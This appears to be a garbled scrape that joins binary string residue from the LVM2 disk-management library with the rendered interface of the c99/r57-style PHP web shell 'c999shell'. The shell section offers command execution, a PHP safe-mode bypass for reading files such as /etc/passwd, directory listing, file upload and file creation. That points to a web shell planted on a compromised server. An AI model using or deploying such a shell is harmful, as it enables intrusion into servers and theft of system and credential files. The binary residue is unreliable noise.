logical volume to %sTHIS MAY DESTROY YOUR DATA (filesystem etc.)Do you really want to reduce %s? [y/n]: Logical volume %s successfully resizedNo additional command line arguments allowedlvscan.cACTIVE inactive OriginalSnapshot%s%s '%s%s/%s' [%s] %sFailed to generate list of copied LVs: can't abort.ABORTING: Failed to generate list of copied LVsABORTING: Segment progression failed.Checking progress every %u secondsBackground process failed to setsid: %sABORTING: Can't reread VG for %sABORTING: Can't find mirror LV in %s for %sABORTING: Mirror percentage check failed.polldaemon.cForking background process(lvm2copyd)%s: %s: %.1f%%pvchange.cCan't get lock for orphansUnable to read PV "%s"Changing uuid of %s to %s.Updating physical volume "%s"Physical volume "%s" changedFinding volume group %s of physical volume %sUnable to find "%s" in volume group "%s"Volume group containing %s does not support tagsVolume group containing %s has active logical volumesCan't change tag on Physical Volume %s not in volume groupAllocatability not supported by orphan %s format PV %sPhysical volume "%s" is already allocatablePhysical volume "%s" is already unallocatableFailed to add tag %s to physical volume %sFailed to remove tag %s from physical volume%sFailed to generate new random UUID for %s.pv_write with new uuid failed for %s.Failed to store physical volume "%s" in volume group "%s"Failed to store physical volume "%s"Setting physical volume "%s" allocatableSetting physical volume "%s" NOT allocatablePlease give exactly one option of -x, -uuid, --addtag or --deltagPlease give a physical volume pathOption a and PhysicalVolumePath are exclusiveUsing physical volume(s) on command lineFailed to read physical volume %sRescan for PVs without metadata areas failed.Scanning for physical volume names%d physical volume%s changed / %d physical volume%s not changedScanning %spvck.c--uuid is required with --restorefileCan only set uuid on one volume at onceUnable to read volume group from %sCan't find uuid %s in backup file %sPhysical volume size may not be negativepvcreate.cpvdisplay.cSkipping volume group %sOption -v not allowed with option -cDevice "%s" has a capacity of %sPhysical volume "%s" of volume group "%s" is exported"%s" is a new physical volume of "%s"pvmove.cABORTING: Can't reread PV %sRemoving temporary pvmove LVMovedFailed to clone PV namepvmove%dSkipping mirror LV %sSkipping mirror log LV %sSkipping mirror image LV %sSkipping locked LV %sLogical volume %s not found.No data to move for %sABORTING: Removal of temporary mirror failedABORTING: Failed to write new data locations to disk.Locking LVs to remove temporary mirror failedSuspension of temporary mirror LV failedUnable to reactivate logical volume "%s"ABORTING: Unable to deactivate temporary logical volume "%s"ABORTING: Removal of temporary pvmove LV failedWriting out final volume group after pvmoveUpdating volume group metadataABORTING: Volume group metadata update failed.Temporary pvmove mirror activation failed.ABORTING: Restoring original configuration before pvmove failed. Run pvmove --abort.Unable to resume logical volumes--name takes a logical volume nameNamed LV and old PV must be in the same VGIncomplete LV name supplied with --nameLogical volume name %s is invalidDetected pvmove in progress for %sIgnoring remaining command line argumentsABORTING: Failed to generate list of moving LVsABORTING: Temporary mirror activation failed.No extents available for allocationCreation of temporary pvmove LV failedlvs_changed list struct allocation failedSkipping snapshot-related LV %sMoving %u extents of logical volume %s/%sAll data on source PV skipped. It contains locked, hidden or non-top level LVs only.Failed to convert pvmove LV to mirroredFailed to split segments being movedPlease enter a physical volume pathOption y can only be given with option fCan't pvremove physical volume "%s" of volume group "%s" without -ff%s: physical volume label not removedWARNING: Wiping physical volume label from %s%s%s%sCan't open %s exclusively - not removing. Mounted filesystem?Failed to wipe existing label(s) on %sLabels on physical volume "%s" successfully wipedpvremove.cPhysical Volume %s not foundReally WIPE LABELS from physical volume "%s" of volume group "%s" [y/n]? Please supply physical volume(s)%d physical volume(s) resized / %d physical volume(s) not resizedUnable to read volume group "%s".Can't get info for PV %s in volume group %s%s: too many metadata areas for pvresizePhysical volume %s format does not support resizing.%s: Pretending size is %llu not %llu sectors.%s: Size must exceed physical extent start of %llu sectors.%s: Size must leave space for at least one physical extent of %u sectors.Resizing volume "%s" to %llu sectors.pvresize.cOptions -e and -n are incompatibleWARNING: only considering physical volumes %sWalking through all physical volumesPV %-*s is in exported VG %s [%s / %s free]PV %-*s VG %-*s %s [%s / %s free]No matching physical volumes foundTotal: %d [%s] / in use: %d [%s] / in no VG: %d [%s]pvscan.cof exported volume group(s)in no volume groupUnable to obtain global lock.%-*s with UUID %sPV %-*s %-*s %s [%s]report/alignedreport/bufferedreport/headingsreport/separatorreport/prefixesreport/quotedreport/columns_as_rowsvg_name,lv_namereport/lvs_sortreport/lvs_colsreport/lvs_cols_verbosevg_namereport/vgs_sortreport/vgs_colsreport/vgs_cols_verbosepv_namereport/pvs_sortreport/pvs_colsreport/pvs_cols_verbosevg_name,lv_name,seg_startreport/segs_sortreport/segs_colsreport/segs_cols_verbosepv_name,pvseg_startreport/pvsegs_sortreport/pvsegs_colsreport/pvsegs_cols_verboseInvalid options string: %sreporter.clv_name,vg_name,lv_attr,lv_size,origin,snap_percent,move_pv,mirror_log,copy_percent,convert_lvlv_name,vg_name,seg_count,lv_attr,lv_size,lv_major,lv_minor,lv_kernel_major,lv_kernel_minor,origin,snap_percent,move_pv,copy_percent,mirror_log,convert_lv,lv_uuidvg_name,pv_count,lv_count,snap_count,vg_attr,vg_size,vg_freevg_name,vg_attr,vg_extent_size,pv_count,lv_count,snap_count,vg_size,vg_free,vg_uuidpv_name,vg_name,pv_fmt,pv_attr,pv_size,pv_freepv_name,vg_name,pv_fmt,pv_attr,pv_size,pv_free,dev_size,pv_uuidlv_name,vg_name,lv_attr,stripes,segtype,seg_sizelv_name,vg_name,lv_attr,seg_start,seg_size,stripes,segtype,stripesize,chunksizepv_name,vg_name,pv_fmt,pv_attr,pv_size,pv_free,pvseg_start,pvseg_sizepv_name,vg_name,pv_fmt,pv_attr,pv_size,pv_free,pvseg_start,pvseg_size,lv_name,seg_start_pe,segtype,seg_pe_rangesoptions string allocation failedCan't report LV and PV fields at the same timeן2:o:D:::::::::::::::::::::::::Olabelsector must be less than %luMetadata and data alignment parameters only apply to text format.Metadatacopies may only be 0, 1 or 2Physical volume data alignment may not be negativePhysical volume data alignment is too big.WARNING: Ignoring data alignment %llu incompatible with --restorefile value (%llu).Physical volume data alignment offset may not be negativePhysical volume data alignment offset is too big.WARNING: Ignoring data alignment offset %llu incompatible with --restorefile value (%llu).Metadata size may not be negativeSpawning background pvmove process for %sSpawning background lvconvert process for %sNames starting "snapshot" are reserved. Please choose a different LV name.Names starting "pvmove" are reserved. Please choose a different LV name.Names including "_mlog" are reserved. Please choose a different LV name.Names including "_mimage" are reserved. Please choose a different LV name.Names including "_vorigin" are reserved. Please choose a different LV name.Unable to allocate physical volume list.Adding PE range: start PE %u length %u on %sOverlapping PE ranges specified (%u-%u, %u-%u) on %sPhysical volume %s not allocatableNo free extents on physical volume "%s"Allocation of pe_ranges list failedPE range error: start extent %u to end extent %uPhysical extent parsing error at %sPhysical Volume "%s" not found in Volume Group "%s"No specified PVs have space availableFailed to read physical volume "%s"Using all physical volume(s) in volume groupUnable to find %s in volume group %sOne or more specified logical volume(s) not found.skip_dev_dir: Couldn't split up device name %sPhysical extent size may not be negativeMax Logical Volumes may not be negativeMax Physical Volumes may not be negativeEnvironment Volume Group in LVM_VG_NAME invalid: "%s""%s": Invalid path for Logical VolumePath required for Logical Volume "%s"Using volume group(s) on command lineUsing logical volume(s) on command linetoollib.cmetadata/pvmetadatasizemetadata/pvmetadatacopies_mimageAllocation of list failedPhysical volume %s is missingSkipping invalid tag %svg/lv string alloc failedLVM_VG_NAMEAllocation of vg_name failedInvalid volume group name: %sFinding all volume groupsNo volume groups foundFinding all logical volumesvgcfgbackup.cFailed to allocate filename.Error processing filename template %sVGs must be backed up into different files. Use %%s in filename for VG name.No backup taken: specify filename with -f to backup an inconsistent VGVolume group "%s" successfully backed up.Volume group name "%s" is invalidPlease specify a *single* volume group to restore.Unable to lock volume group %svgcfgrestore.cUnable to lock orphansRestore failed.Restored volume group %sOne of -a, -c, -l, -p, -s, -x, --refresh, --uuid, --alloc, --addtag or --deltag requiredOnly one of -a, -c, -l, -p, -s, -x, --uuid, --alloc, --addtag or --deltag allowed--ignorelockingfailure only available with -a-A option not necessary with -a optionFailed to add tag %s to volume group %sFailed to remove tag %s from volume group %sVolume group "%s" successfully changedCan't deactivate volume group "%s" with %d open logical volume(s)%d logical volume(s) in volume group "%s" already active%d existing logical volume(s) in volume group "%s" %smonitored%s %d logical volumes in volume group %s%d logical volume(s) in volume group "%s" now active%d logical volume(s) in volume group "%s" %smonitoredVolume group "%s" is already resizeableVolume group "%s" is already not resizeableMaxPhysicalVolumes may not be negativePhysical extent size of VG %s is already %sVolume group has active logical volumesFailed to generate new random UUID for VG %s.Volume group allocation policy is already %sVolume group "%s" is already clusteredVolume group "%s" is already not clusteredvgchange.cDeactivatedActivatedRefreshing volume group "%s"vgck.cPlease provide volume group name and physical volumesInvalid option --metadatacopies, use --pvmetadatacopies instead.A volume group called %s already exists.WARNING: Setting maxlogicalvolumes to %d (0 means unlimited)WARNING: Setting maxphysicalvolumes to %d (0 means unlimited)Volume group format does not support tags%s%colume group "%s" successfully createdvgcreate.cCan't get lock for %s.Clustered Non-clustered Please enter volume group(s)vgconvert.cMetadata parameters only apply to text formatVolume group "%s" already uses format %sArchive of "%s" metadata failed.Logical volume %s lvid format is incompatible with requested metadata format.Logical volume %s must be deactivated before conversion.Use pvcreate and vgcfgrestore to repair from archived metadata.Deleting existing metadata for VG %sRemoval of existing metadata for %s failed.Test mode: Skipping metadata writing for VG %s in format %sWriting metadata for VG %s using format %sConversion failed for volume group %s.Volume group %s successfully convertedvgdisplay.c--- Physical volumes ---Option -c is not allowed with option -sOption -A is not allowed with volume group namesPlease supply volume groups or use -a for all.No arguments permitted when using -a for all.Volume group "%s" has active logical volumesVolume group "%s" successfully exportedvgexport.cPlease enter volume group name and physical volume(s)Checking for volume group "%s"Volume group "%s" will be extended by %d new physical volumesVolume group "%s" successfully extendedvgextend.cVolume group "%s" is not exportedVolume group "%s" is partially missingVolume group "%s" successfully importedvgimport.cPlease enter 2 or more volume groups to mergeDuplicate volume group name "%s"Failed to generate new random LVID for %sVolume group "%s" successfully merged into "%s"vgmerge.cChanged LVID for %s to %svgmknodes.cVolume Groups must always contain at least one PVRemoving PV with UUID %s from VG %sLVs still present on PV with UUID %s: Can't remove from VG %s%s/%s has missing extents: removing (including dependencies)Deactivating (if active) logical volume %s (origin of %s)Please give volume group name and physical volume paths--mirrorsonly requires --removemissingPlease enter physical volume paths or option -aOption -a and physical volume paths mutually exclusivePlease only specify the volume groupVolume group "%s" is already consistentTrying to open VG %s for recovery...Non-mirror-image LV %s found: can't remove.Aborting because --mirrorsonly was specified.Failed to write out a consistent VG for %sFailed to commit consistent VG for %sFailed to resume LVs using error segments.The log device for %s/%s has failed.Log device for %s/%s has failed.Failed to write out updated VG for %sFailed to commit updated VG for %sDeactivating (if active) logical volume %sWARNING: Partial LV %s needs to be repaired or removed. WARNING: There are still partial LVs in VG %s.To remove them unconditionally use: vgreduce --removemissing --force.Proceeding to remove empty missing PVs.Wrote out consistent volume group %sPhysical volume "%s" still in useCan't remove final physical volume "%s" from volume group "%s"Removing "%s" from volume group "%s"Cannot remove final metadata area on "%s" from "%s"Removal of physical volume "%s" from "%s" failedRemoved "%s" from volume group "%s"vgreduce.cFailed to deactivate LV %sRemoving LV %s from VG %sPlease give volume group namePlease enter one or more volume group pathsWARNING: %d physical volumes are currently missing from the system.Do you really want to remove volume group "%s" containing %u logical volumes? [y/n]: vgremove.cVolume group "%s" not removedChecking for new volume group "%s"New volume group "%s" already existsVolume group "%s" still has active LVsOld and new volume group names need specifyingNo complete volume groups foundFound more than one VG called %s. Please supply VG uuid.Volume group "%s" successfully renamed to "%s"vgrename.cRenaming "%s" to "%s"Test mode: Skipping rename.Renaming "%s" to "%s" failedToo many parameters on command lineReading all physical volumes. This may take a while...Found %svolume group "%s" using metadata type %svgscan.cLogical volume "%s" must be inactiveExisting VG, new VG and either physical volumes or logical volume required.A logical volume name cannot be given with physical volumes.Unable to set new VG metadata type based on source VG format - use -M option.Volume group "%s" exists, but new VG option specifiedCan't split Logical Volume %s between two Volume GroupsCan't split mirror %s between two Volume GroupsCan't split snapshot %s between two Volume GroupsCannot split: Nowhere to store metadata for new Volume GroupWriting out updated volume groupsVolume group "%s" became inconsistent: please fix manually%s volume group "%s" successfully split from "%s"vgsplit.cExistingNewHandle initialisation failed.lvmcmdlib.cCmdline copy failed.No command supplied_memlock_inc_memlock_decToo many arguments. Limit is %d./;0&{L&{h&{&|&x|&}&~'$'X@'`'|'('h'X'؂'X (8D(d((x((X(X)()D)ȗ`)()H)h)8)؞*ȟ$*H*h**h***X+$+8@+h`+ت+X+++,Ȭ,(<,ȭ\,x|,,,,-h$-D-d-ȿ-8--x-.$.hD.hd.(...x.8 /,/L/Hl/H/H//H/000xP0t00H0(00 1D1h11x111242T2t2h22H28 2 3 43 P3 l3H33(33( 4,4P4l4(4x448455@5\5x555H5(5h686\6h66686h6X7h<7#`7%7&7X(7(7+8+ 8,D8/h8384888988;9;89X>\9>x9>9>9?9?98?:h? :?@:@d:@:XA:A:B:B;hC(;DH;8Dd;HD;xD;D;E;xE;F<F4<JT<Mt<V<X<Z<8\<] =^D=8^`=_=b=d=g=(h>h0>iP>il>i>m>r>Xs>s ?u0?uL?hvl?y?Xz?|?h}?}@~,@L@p@@@@؍@ȒAh8ATAȘpAA8AHA(A B(,BhLB8lB(BBBhBCH8ChTCHxCCCCCD0DTDpDDDDhDE8$EH@E(dEXEEE8EEFxc8?,c@Pc@pcXDcxGchIcJcHJd\8d8]Xdx^|d`d`dHadfd(geHg4ehXemxemexoe(weye{f}AB GEDAB  HNAB AG ,tAB FNFP>AB GEpAB hAB AX!AB C hAB IE4AB AC $AB AG0AB FPPAB A lAB II>AB FF %AB AG+AB A AB IE \jAB FNE 8qAB AD \AB BC%AB F AB FQ 7AB FQAB FQ AB IIN,(TH H5AB Gd,-AB @ AB 4AB (AB ,!AB @AAB FN pAB FT4PAB FTLsAB CtSAB F`AB F,xAB FQ AB FFN8AB CLB 4 AB P"AM lcAB C$ #AB A8 ^AB D| AB FN AB B| AB C$,7AB F DL AB ACK h8AB INFAB CAB C 4AB FQ AB FNF ,AB  0 hAB IQFT"AB I t$hAB IQF 8&AB AD )AB FQ*XAB CP*(AB AF `+AG <d+AD  XX+*AB LNH|d.AB I 4hAB FQ`4FAB A 4AB FFNp6FAB A6nAB FF<6UAB F\4:AB Dx:aAB C <AB FIt=AB D =AB IQM> AB m CAB FQJ@ FTAB FN``FAB CPHAB F J!AD AJLAB I QAB OI[(W"AB A$XAB E (><AB FLL>2AB Fl>AG >gAB D >lPAB FFN>AB C>AD  ? AB II(?x;AB FH?AB Fh?HAB C? AB I?HAB F ? AB AG?fAB C @DqAB F ,@AB LIP@AB F p@ AB FNF@ :AB F@#AB C @|%JAB FI @&3AB ADA(CAB I$AB OA`@AB FAPEAB FBMAB F B@N3AB AB F LH$XAB AD pHY]AB FNFH,Z=AB JHLZ)AB DH`Z@AB AHZ+AB AIZAB F(Ia AB F HIbAB FNF lIdcAB FQEIdAB Id~AB FF ITeAB FPE I@fAB FIJAB BC`8BAB `AG EDgaAB FgHb,AG FGhXbAB C8hcAD BXhcAD K xhdaAB BC hTddAD ADhdWAB D hdxAB HDi@eAB i4eAB  8i8eAB FQ\ie#AB AxieqAB Ai\fUAB Aif1AB DifAB ifAB jfAB  jfAD AB FI wp AB I]F w AB FNExXZAB F8xzAB FXxAB FQxxhAB C xcAB FFNx4AB FxiAB C xdAB FTE y AB AGDyAB ACdy#AB A yAB FPE y AD IQLy8!AB yPAB AFFAnAG OX^AB D$^{AB CD,a@AB A `PaAB UELcAB EcAB CĉhJAB F i AB AFC xt\AB FT,xAB FLTyAB C l}AB FNFAB C P)AB FPE Ԋ\LAB FNE AB FNF AB FPE@`DAB FN `AB FNFAB C AB CċUAB A @AD INF  AB IS (wAB FFNLgAB FlDs AB C AB BC `\AB FQFԌAB  \AB FQFAB FN4LAB FNTBAB ApAB DdAB IAB DȍHAB B sAB FNF DAB FNF0 AB BP(AB Al AB  AB IS "AB FIЎAB IN AB FFNrAB F 4PAG FNG X(QAB FQ|dAB C4_AB C tzAB FQEAB C@AB C @fAB F@AB F` AB I `AB ACC iAB CĐ\$AB ClAB ClAB F $lAB FNFHAB FhAB CmAB CzAB BȑHwAB C oAB FRF AB C,d AB F L RAB FQ p0 AB FQFKAB A0AB FN ВAB II\ \$AB FFN &c AB INF <T01AB FNF `p2;AB FNF 3AB FFNH4@AB B ȓh5TAB II\ 9AB FFN `:yAB FNF 4;AB FNEX8<AB Ix(DAB FN DAB FNF TEAB IE]FRAB F KAB IT $[pAB FNFH`AB D d|`AB FNF HbAB FNE cAB FQ ЕcDAB IaF kAB INH xlAB FI<l&AH  XmAB FNE |mjAB F[nxAE B 0oAB IQFAB #AB A#AB A 89AB LS\-AB AxAD $AB AfAB LFЗPfAB LF AB E#AB E0AB E QHUHE KZ [H^^^^^[V^^ ^^S_ _v__ _d(_2__7_A_HF_P_C-U___h1 d_n_! s_}_:^^[V^^ ^^S_ _v__ __d__^_____G Rj@ajjVjZj_jdjjkjojujyj%jjjjjjjj*jjjjjjjsuuuvv ,e,e:D  ph pi,e\M $ 3DTbm @ o  P 8#8o"oo"oo oPw0] J0] t J`  PS^ e+`] pPpPipJP^ &  pXT0Pe^ l [@[ ^ 5d( @@@@ AA*A:AJAZAjAzAAAAAAAAA BB*B:BJBZBjBzBBBBBBBBB CC*C:CJCZCjCzCCCCCCCCC DD*D:DJDZDjDzDDDDDDDDD EE*E:EJEZEjEzEEEEEEEEE FF*F:FJFZFjFzFFFFFFFFF GG*G:GJGZGjGzGGGGGGGGG HH*H:HJHZHjHzHHHHHHHHH II*I:IJIZIjIzIIIIIIIII JJ*J:JJJZJjJzJJJJJJJJJ KK*K:KJKZKjKzKKKKKKKKK LL*L:LJLZLjLzLLLLLLLLL MM*M:MJMZMjMzMMMMMMMMM NN*N:NJNZNjNzNNNNNNNNN OO*O:OJOZOjOzOOOOOOOOO PP*P:PJPZPjPd d 0С` vv vvvvv vvvvvv@v v@vv@lpptIPI!^!H`HH`A`?P<0<<211@1+p   `$`H`A`=P<@ Pp   &lv_uuidLV UUIDlv_nameLVйHlv_attrAttr@ \lv_majorMaj `lv_minorMin lv_read_aheadRahead0lv_kernel_majorKMaj`<lv_kernel_minorKMinx lv_kernel_read_aheadKRahead dlv_sizeLSize  seg_count#Seg(originOrigin  origin_sizeOSize  snap_percentSnap%X copy_percentCopy%Pmove_pvMoveconvert_lvConvertlv_tagsLV TagsBmirror_logLog8modulesModulesp pv_fmtFmtP &pv_uuidPV UUID dev_sizeDevSize   pv_namePV b pv_mda_freePMdaFree` pv_mda_sizePMdaSize  \pe_start1st PEL pv_sizePSizeh pv_freePFree0 pv_usedUsedLpv_attrAttr@ dpv_pe_countPE@ hpv_pe_alloc_countAlloc@|pv_tagsPV TagsB pv_mda_count#PMda<vg_fmtFmt P&vg_uuidVG UUID0vg_nameVGpbvg_attrAttr vg_sizeVSizeh vg_freeVFree4vg_sysidSYS IDp @vg_extent_sizeExt Dvg_extent_count#Ext@ Hvg_free_countFree@ Lmax_lvMaxLV@L Pmax_pvMaxPV@ Tpv_count#PV@ lv_count#LV` snap_count#SN vg_seqnoSeq@hvg_tagsVG TagsB vg_mda_count#VMda vg_mda_freeVMdaFree0 vg_mda_sizeVMdaSizehsegtypeType@ stripes#Str@ stripesizeStripe stripe_sizeStripe <regionsizeRegion <region_sizeRegion chunksizeChunk` chunk_sizeChunk` seg_startStart seg_start_peStart seg_sizeSSizep(Lseg_tagsSeg TagsB seg_pe_rangesPE RangesLdevicesDevices  pvseg_startStart@ pvseg_sizeSSize@ ,e,e `н@PPp@ 0  0 0//000//p//`LCD CDE@ZYpY@ZPYY Y0ns0qPpo@oowww0yPЄp@~}`}@}  > p ;JH TH \H tH H H H H H ^H H aH H I I $I ^,I 7I GI OI XI aI kI uI }I `I I ^I I I I I ^I I I aI ^I J J (J 3J :J @JJ @`J tJ J J aJ aaJ _aJ AJ aAJ bJ bJ cJ @cK acK CK C!K ad.K e6K EAK fRK ^fYK faK hhK ?[IoK @i|K iK iK lK lK lK 0lK lK LK LK MK ajL mL ML m(L n/L ^n6L n@L nIL oYL ^OcL ^pjL ^pwL PL PL rL rL RL RL sL sL sL sL tM u M u M ^UM vM V&M x4M axBM ayOM ZUM a-[@; :p liblvm2cmd.so.2.02.debug.data.rodata.shstrtab.dynamic.gnu.version_d.eh_frame.gnu.hash.fini.gnu_debuglink.dynsym.gnu.version.rel.dyn.data.rel.ro.gnu.version_r.jcr.eh_frame_hdr.dynstr.ctors.dtors.bss.init.rel.plt.got.plt.got.text;o<Z pbo "o""8o""o ##8 88 @@@@PP4E  4&1 P     x  ( ( ( ( (P P ` ` ; ` \ x K\ | 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--